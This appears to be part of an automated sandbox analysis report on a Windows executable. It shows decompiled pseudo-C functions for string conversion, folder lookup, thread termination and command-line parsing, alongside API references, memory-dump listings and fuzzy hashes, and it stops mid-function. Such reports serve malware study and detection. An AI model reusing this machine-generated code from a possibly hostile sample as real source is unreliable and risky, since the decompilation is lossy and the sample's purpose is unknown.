                                                                                                                                                                      			E00411F20(short* _a4) {
				void* _t6;
				short _t7;
				int _t12;
				short* _t13;
				short* _t17;
				char* _t18;
				short* _t19;
				int _t20;
				void* _t21;

				_t19 = _a4;
				if(_t19 == 0) {
					L6:
					_t6 = malloc(1);
					 *_t6 = 0;
					return _t6;
				} else {
					_t13 = _t19;
					_t17 =  &(_t13[1]);
					do {
						_t7 =  *_t13;
						_t13 =  &(_t13[1]);
					} while (_t7 != 0);
					_t20 = (_t13 - _t17 >> 1) + 1;
					_t12 = WideCharToMultiByte(0, 0, _t19, _t20, 0, 0, 0, 0);
					if(_t12 == 0) {
						goto L6;
					} else {
						_t4 = _t12 + 1; // 0x1
						_t18 = malloc(_t4);
						_t21 = _t21 + 4;
						if(_t18 == 0) {
							goto L6;
						} else {
							_t18[WideCharToMultiByte(0, 0, _t19, _t20, _t18, _t12, 0, 0)] = 0;
							return _t18;
						}
					}
				}
			}












                                                                                                                                                                      0x00411f23
                                                                                                                                                                      0x00411f2a
                                                                                                                                                                      0x00411f8e
                                                                                                                                                                      0x00411f90
                                                                                                                                                                      0x00411f98
                                                                                                                                                                      0x00411f9f
                                                                                                                                                                      0x00411f2c
                                                                                                                                                                      0x00411f2c
                                                                                                                                                                      0x00411f2e
                                                                                                                                                                      0x00411f31
                                                                                                                                                                      0x00411f31
                                                                                                                                                                      0x00411f34
                                                                                                                                                                      0x00411f37
                                                                                                                                                                      0x00411f48
                                                                                                                                                                      0x00411f57
                                                                                                                                                                      0x00411f5b
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00411f5d
                                                                                                                                                                      0x00411f5d
                                                                                                                                                                      0x00411f66
                                                                                                                                                                      0x00411f68
                                                                                                                                                                      0x00411f6d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00411f6f
                                                                                                                                                                      0x00411f81
                                                                                                                                                                      0x00411f8b
                                                                                                                                                                      0x00411f8b
                                                                                                                                                                      0x00411f6d
                                                                                                                                                                      0x00411f5b

                                                                                                                                                                      APIs
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F51
                                                                                                                                                                      • malloc.MSVCRT ref: 00411F61
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 00411F7B
                                                                                                                                                                      • malloc.MSVCRT ref: 00411F90
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWidemalloc
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2735977093-0
                                                                                                                                                                      • Opcode ID: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
                                                                                                                                                                      • Instruction ID: 2143df0fa8f9e7073c9e362d0ea50869445b156f554053f4d5fb65981249776a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5325b0ad4490700c2010cf27b2c704082c058671d9b3d0b05cc6651335db68c7
                                                                                                                                                                      • Instruction Fuzzy Hash: AE01643738030037E3204A95AC02FA77B4DCBC5B95F19407AFB005E2C6CBB3A8018AB8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 0040A90C, Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • SHGetFolderLocation.SHELL32(00000000,02379F50,00000000,00000000,00000000,00000000,00000000,?,00000104,0040A8BB,00000000,00000000,00000104,?), ref: 0040A91E
                                                                                                                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0040A92F
                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A93A
                                                                                                                                                                      • CoTaskMemFree.OLE32(00000000,?,00000104,0040A8BB,00000000,00000000,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000), ref: 0040A958
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FolderFreeFromListLocationPathTaskwcslen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4012708801-0
                                                                                                                                                                      • Opcode ID: 1d539ddef34536a218538a68ec0bd755f4d96d5f82a4622414e5c8c43dda79cb
                                                                                                                                                                      • Instruction ID: e8765f26a12464aff5057ee3a7a78408a7749531e725ecdfcc70520e35881baf
                                                                                                                                                                      • Opcode Fuzzy Hash: 1d539ddef34536a218538a68ec0bd755f4d96d5f82a4622414e5c8c43dda79cb
                                                                                                                                                                      • Instruction Fuzzy Hash: 70F08136600615BBC7206F66DC0AEAB7F78EF16660B424136F805E6250E7319920C7E5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00405436, Relevance: 6.0, APIs: 4, Instructions: 34threadCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E00405436(intOrPtr _a4) {
				int _t4;
				intOrPtr _t9;
				intOrPtr* _t10;

				_t9 = _a4;
				_t4 = TerminateThread(E004053EA(_t9), 0);
				EnterCriticalSection(0x4176a0);
				_t10 =  *0x4170bc; // 0x0
				while(_t10 != 0) {
					if( *((intOrPtr*)(_t10 + 0xc)) == _t9) {
						_t11 = _t10 + 8;
						CloseHandle( *(_t10 + 8));
						_t4 = E0040DAD2(0x4170bc, _t11);
					} else {
						_t10 =  *_t10;
						continue;
					}
					L6:
					LeaveCriticalSection(0x4176a0);
					return _t4;
				}
				goto L6;
			}






                                                                                                                                                                      0x00405439
                                                                                                                                                                      0x00405446
                                                                                                                                                                      0x00405452
                                                                                                                                                                      0x00405458
                                                                                                                                                                      0x00405467
                                                                                                                                                                      0x00405463
                                                                                                                                                                      0x0040546d
                                                                                                                                                                      0x00405472
                                                                                                                                                                      0x0040547e
                                                                                                                                                                      0x00405465
                                                                                                                                                                      0x00405465
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00405465
                                                                                                                                                                      0x00405485
                                                                                                                                                                      0x00405486
                                                                                                                                                                      0x0040548f
                                                                                                                                                                      0x0040548f
                                                                                                                                                                      0x00000000

                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 004053EA: EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 004053F5
                                                                                                                                                                        • Part of subcall function 004053EA: LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,004053D0,00000000,00401FC5,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405428
                                                                                                                                                                      • TerminateThread.KERNEL32(00000000,00000000,00000000,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000), ref: 00405446
                                                                                                                                                                      • EnterCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405452
                                                                                                                                                                      • CloseHandle.KERNEL32(-00000008,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405472
                                                                                                                                                                        • Part of subcall function 0040DAD2: HeapFree.KERNEL32(00000000,-00000008,0040D3EB,00000010,00000800,?,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040DB0B
                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(004176A0,?,?,-0000012C,00401FD4,00000000,-0000012C,004023BA,00000000,?,00000000,00000001,00000000,00000000,00000000,00000002), ref: 00405486
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$CloseFreeHandleHeapTerminateThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 85618057-0
                                                                                                                                                                      • Opcode ID: 66861cca315dffbfe371a5ba103c1e5b91a8d79734cb270ef81e9151ba7a87fc
                                                                                                                                                                      • Instruction ID: e82d31de5584acb3c1822b09e6e690cbeb5bd259d621742d6e77904c892493b9
                                                                                                                                                                      • Opcode Fuzzy Hash: 66861cca315dffbfe371a5ba103c1e5b91a8d79734cb270ef81e9151ba7a87fc
                                                                                                                                                                      • Instruction Fuzzy Hash: D4F0BE36904710EBC2205F60AC48BEB7B68EB44763726843BF80273190C738AC808E6E
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00403001, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 193COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0040DF60: TlsGetValue.KERNEL32(0000001B,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,0041606C,00000008,0000000C), ref: 0040DF77
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                        • Part of subcall function 00405E50: CharUpperW.USER32(00000000,00000000,FFFFFFF5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000,00000000), ref: 00405EA1
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlReAllocateHeap.NTDLL(02370000,00000000,?,?), ref: 0040DEBC
                                                                                                                                                                        • Part of subcall function 00402E9D: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 00402EC5
                                                                                                                                                                        • Part of subcall function 004092F5: CoInitialize.OLE32(00000000), ref: 00409313
                                                                                                                                                                        • Part of subcall function 004092F5: memset.MSVCRT ref: 00409321
                                                                                                                                                                        • Part of subcall function 004092F5: LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040932E
                                                                                                                                                                        • Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 00409350
                                                                                                                                                                        • Part of subcall function 004092F5: GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 0040935C
                                                                                                                                                                        • Part of subcall function 004092F5: wcsncpy.MSVCRT ref: 0040937D
                                                                                                                                                                        • Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409391
                                                                                                                                                                        • Part of subcall function 004092F5: CoTaskMemFree.OLE32(?), ref: 0040941A
                                                                                                                                                                        • Part of subcall function 004092F5: wcslen.MSVCRT ref: 00409421
                                                                                                                                                                        • Part of subcall function 004092F5: FreeLibrary.KERNEL32(00000000,00000000), ref: 00409440
                                                                                                                                                                        • Part of subcall function 00403CD7: FindResourceW.KERNEL32(00000000,0000000A,00000000,00000000,00000000,00000000,00000000,-00000004,00403A61,00000000,00000001,00000000,00000000,00000001,00000003,00000000), ref: 00403D07
                                                                                                                                                                      • PathAddBackslashW.SHLWAPI(00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000,00000000,FFFFFFF5,00000003,00000000,00000000,00000000,00000000,00000000), ref: 004031CC
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                      • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,0237A158,00000000,00000000,00000200,00000000,00000000,00000200,FFFFFFF5,00000000,00000000,00000000,00000200,00000000), ref: 00403231
                                                                                                                                                                        • Part of subcall function 00402CA9: FindResourceW.KERNEL32(?,0000000A,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402D44
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$FindResourcewcslen$AddressAllocateBackslashErrorFreeHeapLastLibraryPathProc$CharInitializeLoadRemoveTaskUppermemsetwcsncpy
                                                                                                                                                                      • String ID: `A
                                                                                                                                                                      • API String ID: 2009453447-2737472851
                                                                                                                                                                      • Opcode ID: ca0bdc55cb743a91e515f50c3eb5c47eb136c2babfee0e4cd57d064459771e3e
                                                                                                                                                                      • Instruction ID: e0b9ffac2fcbd3cac9e210611f46d13d34f6da227652cecd82e9aee9d1240e54
                                                                                                                                                                      • Opcode Fuzzy Hash: ca0bdc55cb743a91e515f50c3eb5c47eb136c2babfee0e4cd57d064459771e3e
                                                                                                                                                                      • Instruction Fuzzy Hash: 2551C4B9A04B047EE500BBF2DD82E7F666EDAD4718B10983FB440BD0D2C93C9D49666D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004024F1, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                                      			E004024F1(void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a36) {
				char _v0;
				signed int _v4;
				char _v8;
				WCHAR* _v12;
				WCHAR* _v16;
				char _v20;
				void* _t31;
				void* _t32;
				void* _t37;
				WCHAR* _t41;
				void* _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				void* _t56;
				void* _t57;
				void* _t58;
				void* _t59;
				char* _t66;
				void* _t68;
				void* _t69;
				void* _t73;
				char _t84;
				void* _t85;
				void* _t88;
				void* _t90;
				void* _t91;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t101;
				void* _t102;
				intOrPtr* _t103;

				_t102 = __esi;
				_t84 = 9;
				do {
					_t103 = _t103 - 4;
					_v8 = 0;
					_t84 = _t84 - 1;
				} while (_t84 != 0);
				E004051A0(E0040DF60(), _a36);
				 *0x41702c = 0x4160d0;
				_v12 = 0;
				while(1) {
					_t106 = 6 - _v8;
					if(6 < _v8) {
						break;
					}
					_t66 =  *0x41702c; // 0x41609a
					_v4 =  *_t66;
					 *0x41702c =  *0x41702c + 1;
					_t68 = E0040DE20();
					_t98 = _t84;
					_push(_t68);
					_push(_t98);
					_t69 = E0040DE20();
					E00405D60(_t106, _v4 * 0xffffffff);
					E0040DE60( &_v8, _t69);
					_push(_v12);
					_t73 = E0040DE20();
					_pop(_t101);
					E0040DFC0(_t101);
					_t84 = _v20;
					E0040DFC0(_t84);
					E0040DE60( &_v20, _t73);
					 *_t103 =  *_t103 + 1;
					if( *_t103 >= 0) {
						continue;
					}
					break;
				}
				_t31 = E0040DE20();
				_t85 = _t84;
				_push(_t31);
				_t32 = E0040DE20();
				E00409B60(GetCommandLineW(), _t32);
				E0040DE60( &_v0, _t85);
				_push(_v8);
				_t37 = E0040DE20();
				_pop(_t88);
				E0040DFC0(_t88);
				E0040DE60( &_v8, _t37);
				_t41 = _v16;
				PathRemoveArgsW(_t41);
				_v12 = _t41;
				_v12 = E00405D80(_v16);
				if(_v12 > 0) {
					_push(_t88);
					_push(E0040DE20());
					E0040DFC0(0x416026);
					_t56 = E0040DE20();
					_t94 = 0x416026;
					_push(_t56);
					_t57 = E0040DE20();
					_t95 = _t94;
					_push(_t57);
					_t58 = E0040DE20();
					_t96 = _t95;
					_push(_t58);
					_t59 = E0040DE20();
					_t97 = _t96;
					E00405182(E004060B0(_t102, _a4, _a16 + 1, _t59));
					 *_t103 =  *_t103 + _t97;
					E00406000();
					_push( &_v0);
					E0040DE60();
				}
				E00409860(_a4, _a24);
				_push(_a16);
				_t44 = E0040DE20();
				_pop(_t90);
				E0040DFC0(_t90);
				_t46 = _t44;
				_t47 = E00405170();
				_t91 = _t46;
				_t48 = _t47 + _t91;
				return E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(E0040DEF0(_t48, _a12), _v4), _v0), _v8), _a8);
			}






































                                                                                                                                                                      0x004024f1
                                                                                                                                                                      0x004024f2
                                                                                                                                                                      0x004024f7
                                                                                                                                                                      0x004024f7
                                                                                                                                                                      0x004024fa
                                                                                                                                                                      0x00402501
                                                                                                                                                                      0x00402501
                                                                                                                                                                      0x0040250d
                                                                                                                                                                      0x00402517
                                                                                                                                                                      0x0040251c
                                                                                                                                                                      0x00402525
                                                                                                                                                                      0x0040252a
                                                                                                                                                                      0x0040252d
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x0040252f
                                                                                                                                                                      0x00402537
                                                                                                                                                                      0x0040253b
                                                                                                                                                                      0x00402542
                                                                                                                                                                      0x00402547
                                                                                                                                                                      0x00402548
                                                                                                                                                                      0x00402549
                                                                                                                                                                      0x0040254a
                                                                                                                                                                      0x00402559
                                                                                                                                                                      0x00402563
                                                                                                                                                                      0x0040256c
                                                                                                                                                                      0x0040256d
                                                                                                                                                                      0x00402572
                                                                                                                                                                      0x00402575
                                                                                                                                                                      0x0040257a
                                                                                                                                                                      0x0040257f
                                                                                                                                                                      0x00402589
                                                                                                                                                                      0x0040258e
                                                                                                                                                                      0x00402591
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00000000
                                                                                                                                                                      0x00402591
                                                                                                                                                                      0x00402594
                                                                                                                                                                      0x00402599
                                                                                                                                                                      0x0040259a
                                                                                                                                                                      0x0040259c
                                                                                                                                                                      0x004025a9
                                                                                                                                                                      0x004025b3
                                                                                                                                                                      0x004025bc
                                                                                                                                                                      0x004025bd
                                                                                                                                                                      0x004025c2
                                                                                                                                                                      0x004025c5
                                                                                                                                                                      0x004025cf
                                                                                                                                                                      0x004025d4
                                                                                                                                                                      0x004025d9
                                                                                                                                                                      0x004025de
                                                                                                                                                                      0x004025eb
                                                                                                                                                                      0x004025f5
                                                                                                                                                                      0x004025f7
                                                                                                                                                                      0x004025fe
                                                                                                                                                                      0x00402605
                                                                                                                                                                      0x0040260b
                                                                                                                                                                      0x00402610
                                                                                                                                                                      0x00402611
                                                                                                                                                                      0x00402613
                                                                                                                                                                      0x00402618
                                                                                                                                                                      0x00402619
                                                                                                                                                                      0x0040261b
                                                                                                                                                                      0x00402620
                                                                                                                                                                      0x00402621
                                                                                                                                                                      0x00402623
                                                                                                                                                                      0x00402628
                                                                                                                                                                      0x00402639
                                                                                                                                                                      0x0040263e
                                                                                                                                                                      0x00402641
                                                                                                                                                                      0x0040264b
                                                                                                                                                                      0x0040264c
                                                                                                                                                                      0x0040264c
                                                                                                                                                                      0x00402659
                                                                                                                                                                      0x00402662
                                                                                                                                                                      0x00402663
                                                                                                                                                                      0x00402668
                                                                                                                                                                      0x0040266b
                                                                                                                                                                      0x00402670
                                                                                                                                                                      0x00402672
                                                                                                                                                                      0x00402677
                                                                                                                                                                      0x00402678
                                                                                                                                                                      0x004026b7

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCommandLineW.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 004025A3
                                                                                                                                                                      • PathRemoveArgsW.SHLWAPI(?), ref: 004025D9
                                                                                                                                                                        • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402FDE,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                                                                                                                                                                        • Part of subcall function 0040DE60: TlsGetValue.KERNEL32(0000001B,00000000,00000000), ref: 0040DE6C
                                                                                                                                                                        • Part of subcall function 0040DE60: RtlAllocateHeap.NTDLL(02370000,00000000,?), ref: 0040DE99
                                                                                                                                                                        • Part of subcall function 00409860: SetEnvironmentVariableW.KERNELBASE(02379F50,02379F50,00404434,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409879
                                                                                                                                                                        • Part of subcall function 0040DE20: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE26
                                                                                                                                                                        • Part of subcall function 0040DE20: TlsGetValue.KERNEL32(0000001B), ref: 0040DE35
                                                                                                                                                                        • Part of subcall function 0040DE20: SetLastError.KERNEL32(?), ref: 0040DE4B
                                                                                                                                                                        • Part of subcall function 0040DFC0: wcslen.MSVCRT ref: 0040DFD7
                                                                                                                                                                        • Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402FED,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178
                                                                                                                                                                        • Part of subcall function 0040DEF0: HeapFree.KERNEL32(02370000,00000000,00000000,?,00000000,?,00411AC4,00000000,00000000,-00000008), ref: 0040DF08
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.667030176.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.667017539.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667100435.0000000000412000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667124160.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667147330.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667198242.000000000042A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667210866.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667240210.000000000043A000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667257359.0000000000441000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 00000001.00000002.667299931.000000000045F000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Value$ErrorHeapLast$AllocateArgsCommandEnvironmentFreeLinePathRemoveVariablewcslen
                                                                                                                                                                      • String ID: &`A
                                                                                                                                                                      • API String ID: 1199808876-2812803553
                                                                                                                                                                      • Opcode ID: a92ba5b68848cb68a32a4b278cce747947c7e4c0d884cd5ed3ad8e38ee2fe2e7
                                                                                                                                                                      • Instruction ID: f63cb6ba6756906bb1a885948d3e935d11b840abb1ca4822bfa7626acd848ba7
                                                                                                                                                                      • Opcode Fuzzy Hash: a92ba5b68848cb68a32a4b278cce747947c7e4c0d884cd5ed3ad8e38ee2fe2e7
                                                                                                                                                                      • Instruction Fuzzy Hash: 0341EEB59047016ED600BBB2DD8193F77ADEBD4718F10983FB040AA1D2CA3CD8595A6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 004096DA, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                      			E004096DA(void* __eflags, WCHAR* _a4) {
				signed int* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				WCHAR* _t11;
				signed int _t14;
				signed int _t15;
				WCHAR* _t17;
				signed int _t18;
				void* _t21;
				signed int _t23;
				signed int _t24;
				signed int _t25;
				WCHAR* _t26;
				void* _t28;
				void* _t29;
				void* _t30;
				signed int* _t31;
				WCHAR* _t32;

				E0040D288( *0x4176c4);
				_t15 = _t14 | 0xffffffff;
				_t32 = 0;
				_t11 = GetCommandLineW();
				_t31 = _v0;
				_t24 =  *_t11 & 0x0000ffff;
				if(_t24 == 0) {
					L30:
					if(_t31 != 0) {
						L34:
						 *_t31 = 0;
						return _t11;
					}
					return _t15;
				}
				_t17 = _a4;
				_v8 = 0x20;
				_v4 = 0x22;
				do {
					if(_t24 != _v8) {
						L5:
						_t25 =  *_t11 & 0x0000ffff;
						_a4 = 1;
						if(_t25 != _v4) {
							if(_t25 == 0) {
								_t26 = 0;
								L25:
								if(_v0 != _t15 || _t31 == 0) {
									goto L27;
								} else {
									if(_t32 == 0) {
										goto L34;
									}
									 *_t31 = _t17 - _t32 >> 1;
									_v0 =  &(_v0[0]);
									return _t32;
								}
							}
							_t32 = _t11;
							_t21 = 0x20;
							while(_t25 != _t21) {
								_t11 =  &(_t11[1]);
								_t28 = 0x22;
								if( *_t11 != _t28) {
									L20:
									_t25 =  *_t11 & 0x0000ffff;
									if(_t25 != 0) {
										continue;
									}
									break;
								}
								_t11 =  &(_t11[1]);
								_t23 =  *_t11 & 0x0000ffff;
								if(_t23 == 0) {
									L22:
									_t17 = _t11;
									L23:
									_t26 = _a4;
									goto L25;
								}
								while(_t23 != _t28) {
									_t11 =  &(_t11[1]);
									_t23 =  *_t11 & 0x0000ffff;
									if(_t23 != 0) {
										continue;
									}
									break;
								}
								_t21 = 0x20;
								goto L20;
							}
							L10:
							if( *_t11 == 0) {
								goto L22;
							}
							_t17 = _t11;
							_t11 =  &(_t11[1]);
